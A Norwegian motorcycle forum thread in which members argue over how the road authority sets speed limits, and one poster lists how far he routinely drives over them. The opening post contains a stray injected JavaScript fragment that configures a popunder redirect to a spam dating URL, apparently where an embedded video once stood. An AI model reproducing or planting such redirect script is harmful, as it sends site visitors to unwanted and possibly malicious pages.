Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Generelt om MC, nyheter, hendelser, film & bilder, MC i media, kjøreopplæring osv.
Svar
Brukeravatar
AJ
Administrator
Innlegg: 37861
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av AJ »

Kort fortalt fra Statens Vegvesen...:

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Enig eller uenig?
Det spiller antakelig ingen rolle siden våre meninger ikke tillegges særlig vekt i forhold til SV's regelverk og vurderingskriterier... :-k .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Jompa
Moderator
Innlegg: 6967
Registrert: 08 jan 2011, 14:52
Motorsykkelen din: Triumph Sprint GT 1050
Sted: Alta

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av Jompa »

Ja, du har rett i at hva vi mener her er revnende likegyldig for veivesnet.
Argumentene / årsakene til de lave grensene ( under 50) syns jeg er helt ok.
Men 70-skiltene som spretter opp over alt er vel mer til irritasjon enn nytte ?
De aller fleste veiene i landet har verken midttdeler eller rumlefelt og med minimum 8000 biler pr døgn må det vel bli ganske mange flere farlige forbikjøringer i 70 enn 80-sone ?
Damen i filmen nevnte ingenting om sikt som årsak til å sette opp 70 - skilt.
Min personlige mening om mange 70-soner er at de kun er laget for at UP skal hente inn mer penger, særlig der det veksler mellom 60, 70 og 80 med en til to km avstand.
Det er vel ikke sånn at trafikktettheten varierer veldig mye innenfor noen få kilometer ?
De svake øyeblikkene er de beste øyeblikkene.

Brukeravatar
Jompa
Moderator
Innlegg: 6967
Registrert: 08 jan 2011, 14:52
Motorsykkelen din: Triumph Sprint GT 1050
Sted: Alta

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av Jompa »

Nesten 200 visninger og ingen som mener noe om fartsgrensene ? :O
Fy fader for en dau gjeng :twisted
Hvor er dere som ellers har skallen full av meninger blitt av ?
Bjerknez, Simpson, Mekkern, Cannon, og alle andre. (de jeg kom på i farta)
Har dere krøpet inn i vinterhiet allerede ?
Kom igjen, slappinger. Kjør diskusjon. :crazy:
De svake øyeblikkene er de beste øyeblikkene.

Brukeravatar
kgjersda
Innlegg: 645
Registrert: 24 apr 2017, 11:58
Motorsykkelen din: S1000RR -22, CBR1000RR -05

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av kgjersda »

Eller kanskje vi bare har en slapp holdning til fartsgrenser?
Det evige beitet: Rieju RMX 50 // Yamaha DT125RE // Yamaha Fazer FZS600 // Yamaha MT-10 SP -17
I stallen: BMW S1000RR -22 // Honda CBR1000RR -05 (Banesykkel)

Brukeravatar
Hjernen
Innlegg: 802
Registrert: 14 des 2010, 11:07
Motorsykkelen din: 1996 Honda NTV 650 (Revere)
Sted: Porsgrunn

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av Hjernen »

70 er en uting, greit nok mellom 80 og 50 sone men ikke over lengre strekke. Altfor lett å kjøre forbi andre eller at noen skaper en farlig situasjon ( les; søndagstur ) da.....

Sent fra min SM-T530 via Tapatalk

Hvis en gjør slik, funker det da tru??

Member of Festus Mc Porsgrunn.

Klubbens hjemmeside er nå oppe å går: http://festusmc.wix.com/homepage
Min youtubekanal: http://www.youtube.com/user/h1ern1?feature=mhee
Photobucket: http://s5.photobucket.com/albums/y176/Hjernen/
Klassisk Honda-forum: http://forum.classichonda.no/index.php
Siste turen er om http://www.7is7.com/otto/countdown.html ... 20sesongen

Brukeravatar
AJ
Administrator
Innlegg: 37861
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av AJ »

Knapt noen i det hele tatt respekterer 70-sonen på Hakadalssletta (Hadelandsvegen/Rv. 4), som er en vei jeg stadig vekk kjører. At det er 70 på denne rette strekningen uten bebyggelse er uforståelig.
Derimot er det 80 fra sør for Roa til fylkesgrensa Akershus. Også på strekningen fra crossbanen på Stryken til der 70 sonen begynner.
På nettopp denne strekningen omkom en bilfører i møte med en elg for noen år siden. Visstnok en narkoman uten kjøretillatelsene i orden...
Ble ingen fartsgrenseendring etter denne dødsulykken.
Det ble det derimot der det nå er strekningfartsmåling mellom Grua og Harestua etter dødsulykke på denne strekningen. Ned fra 90 til 80m på OL-vegen, som sto klar til å ta i mot publikummere og utøvere til Olympiaden på Lillehammer i '84...

Må si det er mange tilfeller jeg ikke forstår kriteriene som er førende for hva fartsgrensene skal være... :scratch .
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Brukeravatar
Rune75
Innlegg: 1041
Registrert: 17 jun 2013, 09:29
Motorsykkelen din: Din MC her

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av Rune75 »

Jompa skrev: 27 aug 2017, 13:49 Nesten 200 visninger og ingen som mener noe om fartsgrensene ? :O
Fy fader for en dau gjeng :twisted
Hvor er dere som ellers har skallen full av meninger blitt av ?
Bjerknez, Simpson, Mekkern, Cannon, og alle andre. (de jeg kom på i farta)
Har dere krøpet inn i vinterhiet allerede ?
Kom igjen, slappinger. Kjør diskusjon. :crazy:
Er vel egentlig ikke noe å diskutere detta. Høres fornuftig ut. Sikkerhet først. Det er jo bare å kjøre i den farta som er anvist på skiltene, forstår ikke hvordan det kan være irriterende.

ZZR-Erling

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av ZZR-Erling »

Å følge fartsgrensene gir sjelden flyt i trafikken, og lite flyt gir kø, og med de kommer forbikjøringer som er alt fra ok til dødsulykker..
Norske fartsgrenser er så lave at de ofte helt mister sin legitimitet,og blir sett på som missvisende.

Brukeravatar
Jompa
Moderator
Innlegg: 6967
Registrert: 08 jan 2011, 14:52
Motorsykkelen din: Triumph Sprint GT 1050
Sted: Alta

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av Jompa »

Rune75 skrev: 27 aug 2017, 17:36
Jompa skrev: 27 aug 2017, 13:49 Nesten 200 visninger og ingen som mener noe om fartsgrensene ? :O
Fy fader for en dau gjeng :twisted
Hvor er dere som ellers har skallen full av meninger blitt av ?
Bjerknez, Simpson, Mekkern, Cannon, og alle andre. (de jeg kom på i farta)
Har dere krøpet inn i vinterhiet allerede ?
Kom igjen, slappinger. Kjør diskusjon. :crazy:
Er vel egentlig ikke noe å diskutere detta. Høres fornuftig ut. Sikkerhet først. Det er jo bare å kjøre i den farta som er anvist på skiltene, forstår ikke hvordan det kan være irriterende.
Det irriterer ikke meg å kjøre etter fartsgrensa, men korte 70-soner plassert mellom 60 og 80-soner, virker som de er laget kun for at politiet skal få egnede plasser å drive kontroller på.
De svake øyeblikkene er de beste øyeblikkene.

Brukeravatar
KåreDump
Innlegg: 709
Registrert: 27 feb 2015, 15:24
Motorsykkelen din: Støypjernskomfyr med vesker

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av KåreDump »

Jompa skrev: 26 aug 2017, 12:16 Argumentene / årsakene til de lave grensene ( under 50) syns jeg er helt ok.
Men 70-skiltene som spretter opp over alt er vel mer til irritasjon enn nytte ?
De aller fleste veiene i landet har verken midttdeler eller rumlefelt og med minimum 8000 biler pr døgn må det vel bli ganske mange flere farlige forbikjøringer i 70 enn 80-sone ?
Helt enig, og noterer at jeg selv er flinkest til å overholde de laveste fartsgrensene.
ZZR-Erling skrev: 01 sep 2017, 11:23 Å følge fartsgrensene gir sjelden flyt i trafikken, og lite flyt gir kø, og med de kommer forbikjøringer som er alt fra ok til dødsulykker..
Norske fartsgrenser er så lave at de ofte helt mister sin legitimitet,og blir sett på som missvisende.
Enig i at fartsgrensene er alt for lave i kongeriket, men de fleste steder med 50 eller lavere or forståelige.
I never apologize.
I'm sorry, but that's just the way I am.

Brukeravatar
Rune75
Innlegg: 1041
Registrert: 17 jun 2013, 09:29
Motorsykkelen din: Din MC her

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av Rune75 »

Jompa skrev: 01 sep 2017, 17:27
Rune75 skrev: 27 aug 2017, 17:36
Jompa skrev: 27 aug 2017, 13:49 Nesten 200 visninger og ingen som mener noe om fartsgrensene ? :O
Fy fader for en dau gjeng :twisted
Hvor er dere som ellers har skallen full av meninger blitt av ?
Bjerknez, Simpson, Mekkern, Cannon, og alle andre. (de jeg kom på i farta)
Har dere krøpet inn i vinterhiet allerede ?
Kom igjen, slappinger. Kjør diskusjon. :crazy:
Er vel egentlig ikke noe å diskutere detta. Høres fornuftig ut. Sikkerhet først. Det er jo bare å kjøre i den farta som er anvist på skiltene, forstår ikke hvordan det kan være irriterende.
Det irriterer ikke meg å kjøre etter fartsgrensa, men korte 70-soner plassert mellom 60 og 80-soner, virker som de er laget kun for at politiet skal få egnede plasser å drive kontroller på.

Blir jo forklart i filmen hvorfor det det er 70-soner. Det var ikke for at politiet skal få egnede plasser å drive kontroller. Hvis det ikke irriterer deg å kjøre etter fartsgrensene så er det jo bare å kjøre i fartsgrensa da, hvis du derimot ikke får med deg skiltene det står 70 på så er jo det et annet problem.

L M
Innlegg: 97
Registrert: 09 apr 2017, 19:00
Motorsykkelen din: Street Triple RS - 18

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av L M »

Rune75 skrev: 05 sep 2017, 14:55
Jompa skrev: 01 sep 2017, 17:27
Rune75 skrev: 27 aug 2017, 17:36
Jompa skrev: 27 aug 2017, 13:49 Nesten 200 visninger og ingen som mener noe om fartsgrensene ? :O
Fy fader for en dau gjeng :twisted
Hvor er dere som ellers har skallen full av meninger blitt av ?
Bjerknez, Simpson, Mekkern, Cannon, og alle andre. (de jeg kom på i farta)
Har dere krøpet inn i vinterhiet allerede ?
Kom igjen, slappinger. Kjør diskusjon. :crazy:
Er vel egentlig ikke noe å diskutere detta. Høres fornuftig ut. Sikkerhet først. Det er jo bare å kjøre i den farta som er anvist på skiltene, forstår ikke hvordan det kan være irriterende.
Det irriterer ikke meg å kjøre etter fartsgrensa, men korte 70-soner plassert mellom 60 og 80-soner, virker som de er laget kun for at politiet skal få egnede plasser å drive kontroller på.

Blir jo forklart i filmen hvorfor det det er 70-soner. Det var ikke for at politiet skal få egnede plasser å drive kontroller. Hvis det ikke irriterer deg å kjøre etter fartsgrensene så er det jo bare å kjøre i fartsgrensa da, hvis du derimot ikke får med deg skiltene det står 70 på så er jo det et annet problem.
Jeg kjenner ingen som konsekvent kjører i fartsgrensa. Selv respekterer jeg fartsgrenser under 60, men på en typisk tur i bil / på sykkel følger jeg trafikken:

60 = 70
70 = 85-90
80 = 90-100
100 = 115 +/-
110 = 130

Disse tallene representerer det jeg opplever at trafikken flyter i. Har hatt mange turer på "nyveien" mellom Gardermoen og Roa i sommer (typisk inngjerdet riksvei med særdeles god veistandard), og her lå biler i kolonner, alle i rundt 100 km/t. De som ligger i 80 blir forbikjørt av samtlige.
Og bare så det er sagt: jeg er fullstendig klar over at jeg er en del av "problemet" - jeg prøver bare å poengtere at dette er uskrevne (og ulovlige) trafikkregler.
Det er nesten så jeg er tilbøyelig til å ikke tro på de som mener de alltid kjører i fartsgrensa. Selv de som er mest forsiktig (70km/t i 80-sone) kjører over fartsgrensa i 50/60-sone.

Online
Brukeravatar
JohnnyTh
Innlegg: 3439
Registrert: 24 aug 2010, 13:20
Motorsykkelen din: BMW R1250GSA
Sted: Lista

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av JohnnyTh »

Jeg sliter med å forstå en del av 70 sonene. Jeg merker jeg blir ofte ukonsentrert og trøtt I disse 70 sonene da det ofte oppleves som dørgende kjedelig å kjøre I en hastighet som man opplever for lav.
50 og 60 sonene er jeg mer enig I, men en gang på vei til Fyresdag ble jeg stoppet midt I skogen på en lang rett strekning. Trodde jeg kjørte lovlig men viste seg at kontrollen var helt I slutten av ei sekstisone. I slutten av sletta så ble det 80. Ganske uforståelig for meg.
Bikers do it all the time, why dont humans. -Jerremy Clarkson, Top Gear.

Brukeravatar
Skogstrollet
Innlegg: 742
Registrert: 03 okt 2016, 13:29
Motorsykkelen din: Honda CRF250L, Yamaha XSR700
Sted: Oslo

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av Skogstrollet »

Tror egentlig ikke det er fartsgrensene som er problemet, men innstillingen til disse. Hvis de blir satt opp, kommer nok uansett de fleste å ligge 10-20 over også de nye grensene - i hvert fall i 70+ soner. Tror nok folk vil fortsette å kjøre så mye over fartsgrensen de føler er 'sikkert' mtp å bli tatt.
Jeg sier ikke at jeg selv er uskyldig i dette...

Nok for at det kan være gøy å kjøre fort, men tror det er litt mye av å måtte frem raskest mulig (noen ganger til enhver pris) blant folk generelt.
"Finns ingen plats att gömma sig
Vart du än går skogen hittar dig"

Brukeravatar
Grendel
Innlegg: 489
Registrert: 20 apr 2016, 20:54
Motorsykkelen din: '98 Yamaha XJ600 / '14 Yamaha Bolt

Re: Norske fartsgrenser - slik blir de bestemt, enkelt og greit...?

Legg inn av Grendel »

Det har dessverre blitt for "moderne" å sette ned fartsgrensene. Det hele er helt problemfritt dersom man setter på "miljø-prefikset", og da er alle motargumenter lagt døde. Det er en ekkel trend som blåser over landet med å bygge ned trafikkflyten og heller endre kryss og veier for å lage kø. Å redusere fartsgrensene er en av våre høyt ærede myndigheters verktøykasse for å skape kvalme i trafikken; eller å bedre miljøet som de kaller det.

8-/
...bare en død fisk følger strømmen....

Nåværende: 1998 Yamaha XJ600 (2017-), 2014 Yamaha XVS95R Bolt (2021-)
Tidligere sykler: , 1984 Suzuki ZR50S (2015-17)
NMCU https://nmcu.org/ (Ivaretar rettighetene til MC-kjørere)
Yamaha Custom Club http://ycc.no/ (Klubben for alle Yamaha-kjørere)

Svar